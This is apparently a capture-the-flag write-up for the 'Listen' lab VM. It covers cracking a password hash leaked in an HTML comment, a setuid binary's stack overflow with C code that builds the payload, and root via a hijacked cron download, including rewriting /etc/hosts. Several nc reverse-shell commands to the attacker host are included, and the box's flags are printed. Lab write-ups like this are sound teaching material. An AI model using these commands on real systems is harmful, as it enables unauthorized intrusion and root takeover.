Host discovery

```
┌──(root㉿xhh)-[~/Desktop/xhh/HMV/listen]
└─# arp-scan -I eth1 -l
192.168.56.147  08:00:27:2a:db:7b  PCS Systemtechnik GmbH
```

Target address: 192.168.56.147
Port scan

```
┌──(root㉿xhh)-[~/Desktop/xhh/HMV/listen]
└─# nmap 192.168.56.147 -p-
PORT   STATE    SERVICE
22/tcp filtered ssh
80/tcp filtered http

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/listen]
└─# nmap 192.168.56.147
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

The first scan showed both ports as filtered and I thought something was wrong; scanning again, both were open. My guess is that, as on a previous box, some port has to be knocked first, and the full `nmap -p-` scan happened to hit it.
Probing port 80

```
┌──(root㉿xhh)-[~/Desktop/xhh/HMV/listen]
└─# curl 192.168.56.147
<pre><h1>Please Listen</h1>
When I ask you to listen to me and you start giving me advice, You have not done what I asked.
When I ask you to listen to me and you begin to tell me why I shouldnt feel that way, you are trampling on my feelings.
When I ask you to listen to me and you feel you have to do something to solve my problem, you have failed me, strange as that may seem.
Listen! All I ask is that you listen. Dont talk or do, just hear me... And I can do for myself; I am not helpless.
Maybe discouraged and faltering, but not helpless.
When you do something for me that I can and need to do for myself, you contribute to my fear and Inadequacy.
But when you accept as a simple fact That I feel what I feel, No matter how irrational,
Then I can stop trying to convince You and get about this business Of understanding whats behind This irrational feeling.
And when thats clear, the answers are obvious and I dont need advice.
Irrational feelings make sense when we understand whats behind them.
So please listen, and just hear me. And if you want to talk, wait a minute for your turn, and I will listen to you.
-Leo Buscaglia</pre>
<!-- Leo please, stop using your poems as password!
leo:$6$GyxLtjMYaQWxRxfl$w0mjIXfmU1T8bac2HgweZmxgFjGSiX8kbPDWhJzAzFn.BFk9X9fPT6DHXlp.A3J5yA64qQJH6Iu4K4AW4THIw.:18551:0:99999:7::: -->
```

The HTML comment contains a shadow-format entry for leo and a hint to stop using poems as passwords, so the password should be one of the words in the poem above.
Cracking leo's password

```
┌──(root㉿xhh)-[~/Desktop/xhh/HMV/listen]
└─# cewl 192.168.56.147 > pass.txt

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/listen]
└─# echo "leo:\$6\$GyxLtjMYaQWxRxfl\$w0mjIXfmU1T8bac2HgweZmxgFjGSiX8kbPDWhJzAzFn.BFk9X9fPT6DHXlp.A3J5yA64qQJH6Iu4K4AW4THIw.:18551:0:99999:7:::" > tmp

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/listen]
└─# john tmp --wordlist=pass.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
contribute       (leo)
1g 0:00:00:00 DONE (2025-12-17 00:27) 5.555g/s 600.0p/s 600.0c/s 600.0C/s CeWL 6.2.1 (More Fixes) Robin Wood (robin@digi.ninja) (https://digi.ninja/)..discouraged
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

The `$` characters in the hash have to be escaped so the shell does not expand them as variables. The "first..last candidate" field in john's status line starts with the CeWL banner: cewl writes its banner to stdout, so it became the first line of pass.txt. That costs one wasted candidate and nothing else. The password is cracked: leo:contribute
To leo

```
┌──(root㉿xhh)-[~/Desktop/xhh/HMV/listen]
└─# ssh leo@192.168.56.147
leo@listen:~$ id
uid=1001(leo) gid=1001(leo) groups=1001(leo)
leo@listen:~$
```

To silence
Looking at /home and the current user's directory

```
leo@listen:~$ ls -al /home
total 20
drwxr-xr-x  5 root    root    4096 Oct 16  2020 .
drwxr-xr-x 18 root    root    4096 Oct 16  2020 ..
drwxr-xr-x  2 leo     leo     4096 Oct 16  2020 leo
drwxr-xr-x  3 listen  listen  4096 Oct 16  2020 listen
drwxr-xr-x  3 silence silence 4096 Oct 16  2020 silence
leo@listen:~$ ls -al
total 44
drwxr-xr-x 2 leo  leo  4096 Oct 16  2020 .
drwxr-xr-x 5 root root 4096 Oct 16  2020 ..
-rw------- 1 leo  leo    12 Oct 16  2020 .bash_history
-rw-r--r-- 1 leo  leo   220 Oct 16  2020 .bash_logout
-rw-r--r-- 1 leo  leo  3526 Oct 16  2020 .bashrc
-rwsrws--- 1 root leo 16872 Oct 16  2020 poem
-rw-r--r-- 1 leo  leo   807 Oct 16  2020 .profile
```

There are three users, and leo's home directory holds a binary named poem that is setuid root and setgid leo (mode rwsrws---), so only members of group leo can run it, and it runs with root's privileges.
Decompiling poem

```c
int __fastcall main(int argc, const char **argv, const char **envp)
{
  _BYTE v4[108]; // [rsp+10h] [rbp-70h] BYREF
  int n5880;     // [rsp+7Ch] [rbp-4h]   uninitialized

  printf("Ask me:\n ");
  __isoc99_scanf("%s", v4);   // unbounded read into v4
  if ( n5880 == 5880 )        // compares the uninitialized local
  {
    setuid(0);
    setgid(0);
    system("/bin/bash");
  }
  else
  {
    puts("\nWhy");
  }
  return 0;
}
```

v4 is 108 bytes starting at rbp-0x70 and n5880 sits at rbp-4, which is the byte immediately after v4, and `scanf("%s")` has no length limit. The plan is therefore to overflow v4 and overwrite n5880 with the value 5880.
Checking which protections the binary has

```
┌──(root㉿xhh)-[~/Desktop/xhh/HMV/listen]
└─# checksec --file=./poem
RELRO           STACK CANARY      NX           PIE           RPATH      RUNPATH     Symbols     FORTIFY  Fortified  Fortifiable  FILE
Partial RELRO   No canary found   NX enabled   PIE enabled   No RPATH   No RUNPATH  69 Symbols  No       0          1            ./poem
```

PIE is enabled. Note also that there is no stack canary, so nothing detects an overwrite of the locals above the buffer.
PIE: Position Independent Executable

How it works

An ordinary executable (ELF type EXEC) has its code and data segments assigned fixed virtual addresses at link time. A PIE binary is loaded at a randomized base address each time it runs (this is the part of ASLR, address space layout randomization, that covers the executable itself).

What it does

It defends against exploits that depend on known memory addresses (return-to-libc, ROP chains built from the binary's own gadgets, jumping to a fixed function address): the attacker cannot predict where code lives ahead of time, which makes exploitation considerably harder. It does nothing against corrupting data that sits next to the overflowed buffer, because no address is needed for that.

Compiling and detecting

- Build with PIE enabled (GCC):

```
gcc -fPIE -pie -o test test.c
```

- Check whether a binary is PIE:

```
readelf -h test | grep Type
```

If the output says `DYN (Shared object file)` (newer binutils prints `DYN (Position-Independent Executable file)`) the binary is PIE; an ordinary executable shows `EXEC (Executable file)`.

Impact on attack and defense

- Defense: most system binaries on current Linux distributions are built as PIE by default, which raises the bar across the whole system.
- Attack: PIE has to be bypassed with an information leak (for example leaking the libc or binary base) before any address-dependent ROP chain can be built.
PIE only matters when the exploit needs an address. Here the target is an adjacent local variable, n5880, and there is no canary, so overwriting it with an overlong input does not depend on any address at all. The writeup takes the intended route instead.
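Added example (not from the original writeup and not the box's poem binary) showing why PIE is irrelevant to this overwrite. It models the frame from the decompile (108-byte buffer followed directly by the int) as a struct, writes the input through a char pointer to the struct's bytes so the demo is deterministic and not undefined behaviour, and contrasts the unbounded `scanf("%s")` read with a width-limited one. The function names `build_payload`, `vulnerable_check` and `hardened_check` are mine, and a little-endian host (x86-64, like the box) is assumed.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Added example: the decompile places char v4[108] at rbp-0x70 and int n5880
 * at rbp-4, so the int sits directly after the buffer. That layout is modelled
 * as a struct; the overwrite goes through a char pointer to the whole struct,
 * which is defined behaviour, unlike overrunning a real stack frame.
 * Assumes a little-endian host. */
#define BUF_LEN 108
#define MAGIC   5880          /* 0x16F8: the value main() compares n5880 against */

struct frame {
    char buf[BUF_LEN];        /* v4 */
    int  n5880;               /* never initialised by the binary */
    char next_slot[8];        /* stands in for the saved rbp; absorbs the terminating NUL */
};

/* scanf("%s") behaviour: copy until whitespace or end of input, no length limit. */
static size_t read_unbounded(char *dst, const unsigned char *in, size_t inlen)
{
    size_t n = 0;
    while (n < inlen && !isspace(in[n])) {
        dst[n] = (char)in[n];
        n++;
    }
    dst[n] = '\0';
    return n;
}

/* Hardened read, equivalent to scanf("%107s"): never writes past cap bytes. */
static size_t read_bounded(char *dst, size_t cap, const unsigned char *in, size_t inlen)
{
    size_t n = 0;
    while (n < inlen && n + 1 < cap && !isspace(in[n])) {
        dst[n] = (char)in[n];
        n++;
    }
    dst[n] = '\0';
    return n;
}

/* Payload: 108 filler bytes, then 5880 as a little-endian 32-bit int.
 * None of the bytes f8 16 00 00 is whitespace, so "%s" keeps reading through them. */
size_t build_payload(unsigned char *out, size_t cap)
{
    unsigned int v = MAGIC;
    if (cap < BUF_LEN + 4)
        return 0;
    memset(out, 'A', BUF_LEN);
    for (int i = 0; i < 4; i++)
        out[BUF_LEN + i] = (unsigned char)(v >> (8 * i));
    return BUF_LEN + 4;
}

/* 1 if the input reaches the setuid(0) branch with the unbounded read. */
int vulnerable_check(const unsigned char *in, size_t inlen)
{
    struct frame f;
    memset(&f, 0, sizeof f);                 /* zeroed so the result is deterministic */
    read_unbounded((char *)&f, in, inlen);   /* buf is at offset 0 of the frame */
    return f.n5880 == MAGIC;
}

/* Same frame, bounded read: the write can never reach n5880. */
int hardened_check(const unsigned char *in, size_t inlen)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    read_bounded(f.buf, sizeof f.buf, in, inlen);
    return f.n5880 == MAGIC;
}

int overflow_payload_reaches_branch(void)
{
    unsigned char p[BUF_LEN + 16];
    size_t n = build_payload(p, sizeof p);
    return vulnerable_check(p, n);
}

int overflow_payload_blocked_when_bounded(void)
{
    unsigned char p[BUF_LEN + 16];
    size_t n = build_payload(p, sizeof p);
    return hardened_check(p, n) == 0;
}

int main(void)
{
    const unsigned char benign[] = "hello";
    printf("benign input reaches branch:    %d\n", vulnerable_check(benign, 5));
    printf("overflow payload, vulnerable:   %d\n", overflow_payload_reaches_branch());
    printf("overflow payload, bounded read: %d\n", !overflow_payload_blocked_when_bounded());
    return 0;
}
```

Nothing in the payload is an address, which is the whole point: randomizing the base of the binary changes where `main` lives but not the distance between v4 and n5880. What does matter is that the four value bytes must not contain whitespace (a NUL byte is fine for `scanf`, it is not in `isspace`'s set), and that on the real binary the bytes would have to reach `scanf` on stdin rather than through a `struct`; that run is not part of this writeup.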
Packet capture

From the box's theme, the intended step is to capture traffic, but something in my environment or the VM kept me from capturing anything. The capture would show these two messages:

```
Knock me to port 1337
silence/listentome
```

The first is the port-knocking hint, which is consistent with the full port scan earlier having opened 22 and 80 by touching 1337; the second is a username and password for silence.
To listen

```
leo@listen:~$ su - silence
Password:
silence@listen:~$ id
uid=1000(silence) gid=1000(silence) groups=1000(silence),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
```

Looking at the files in silence's home:

```
silence@listen:~$ cat note.txt
"listen" told me that if I listen, I will hear his password....
silence@listen:~$ cat listen.sh
#!/bin/sh
cat /home/listen/password.txt > /dev/pts/4
```
/dev/pts/4 is a pseudo-terminal device (pts, pseudo-terminal slave): one interactive terminal session, such as an SSH login, a terminal window or a reverse shell. Linux has two kinds of terminal:

- virtual consoles (/dev/tty1 to /dev/tty6): the console on the machine itself (switch with Ctrl+Alt+F1 to F6);
- pseudo-terminals (/dev/pts/N): virtual terminals backing remote logins (SSH), graphical terminals (GNOME Terminal), shell emulation (reverse shells and the like), where N is a number (4, 5, 6, ...).

pts numbers are handed out from 0, so /dev/pts/4 is the fifth pseudo-terminal in use. Open five connections (`tty` shows which one a session got); there is presumably a scheduled task running listen.sh, and after a while the password lands on the last terminal:
```
┌──(root㉿xhh)-[~]
└─# ssh silence@192.168.56.147
Linux listen 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Dec 16 13:02:07 2025 from 192.168.56.247
silence@listen:~$ shhhhhh
shhhhhh
```

That gives the password: listen:shhhhhh
To root

```
silence@listen:~$ su - listen
Password:
listen@listen:~$ id
uid=1002(listen) gid=1002(listen) groups=1002(listen)
listen@listen:~$ cat listentome.sh
wget -O - -q http://listen/ihearyou.sh | bash
```

Like listen.sh above, this is presumably run on a schedule, and it pipes whatever `http://listen/ihearyou.sh` returns straight into bash. Whoever controls what the name `listen` resolves to, or the script file itself, controls what that job executes.
Method 1:

The script fetches from a hostname, so check /etc/hosts:

```
listen@listen:~$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 listen

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
listen@listen:~$ ls -al /etc/hosts
-rw-rw-r-- 1 root listen 186 Oct 16  2020 /etc/hosts
```

`listen` resolves to 127.0.1.1, and /etc/hosts is owned by root:listen with mode 664, so the listen user can write it. With the default nsswitch order (files before dns), whatever is in this file wins.
Replace 127.0.1.1 with the attacker's IP, create a malicious ihearyou.sh on the attacker and serve it over HTTP:

```
# target
listen@listen:~$ nano /etc/hosts
listen@listen:~$ cat /etc/hosts
127.0.0.1 localhost
192.168.56.247 listen

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
listen@listen:~$

# attacker
┌──(root㉿xhh)-[~/Desktop/xhh/HMV/listen]
└─# echo "nc 192.168.56.247 6666 -e /bin/bash" > ihearyou.sh

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/listen]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.56.147 - - [17/Dec/2025 02:22:03] "GET /ihearyou.sh HTTP/1.1" 200 -
```

The target fetched the malicious file. A listener in another terminal catches the reverse shell:

```
┌──(root㉿xhh)-[~]
└─# nc -lvnp 6666
listening on [any] 6666 ...
connect to [192.168.56.247] from (UNKNOWN) [192.168.56.147] 40080
id
uid=0(root) gid=0(root) groups=0(root)
```

Method 2:
listentome.sh lives in listen's home directory. Even though it is root's file, the directory belongs to listen, so it can be removed and replaced with a malicious file of the same name:

```
listen@listen:~$ echo "nc 192.168.56.247 6666 -e /bin/bash" > listentome.sh
listen@listen:~$ ls -la
total 36
drwxr-xr-x 3 listen listen 4096 Dec 16 13:27 .
drwxr-xr-x 5 root   root   4096 Oct 16  2020 ..
-rw-r--r-- 1 listen listen  220 Oct 16  2020 .bash_logout
-rw-r--r-- 1 listen listen 3526 Oct 16  2020 .bashrc
-rw-r--r-- 1 listen listen   36 Dec 16 13:27 listentome.sh
drwxr-xr-x 3 listen listen 4096 Oct 16  2020 .local
-rw------- 1 listen listen    8 Oct 16  2020 password.txt
-rw-r--r-- 1 listen listen  807 Oct 16  2020 .profile
-rw------- 1 listen listen   15 Oct 16  2020 user.txt
listen@listen:~$

┌──(root㉿xhh)-[~]
└─# nc -lvnp 6666
listening on [any] 6666 ...
connect to [192.168.56.247] from (UNKNOWN) [192.168.56.147] 40156
id
uid=0(root) gid=0(root) groups=0(root)
```

This also yields a root shell.
user.txt

```
listen@listen:~$ cat user.txt
HMVimlistening
```

root.txt

```
cat root.txt
HMVthxforlisten
```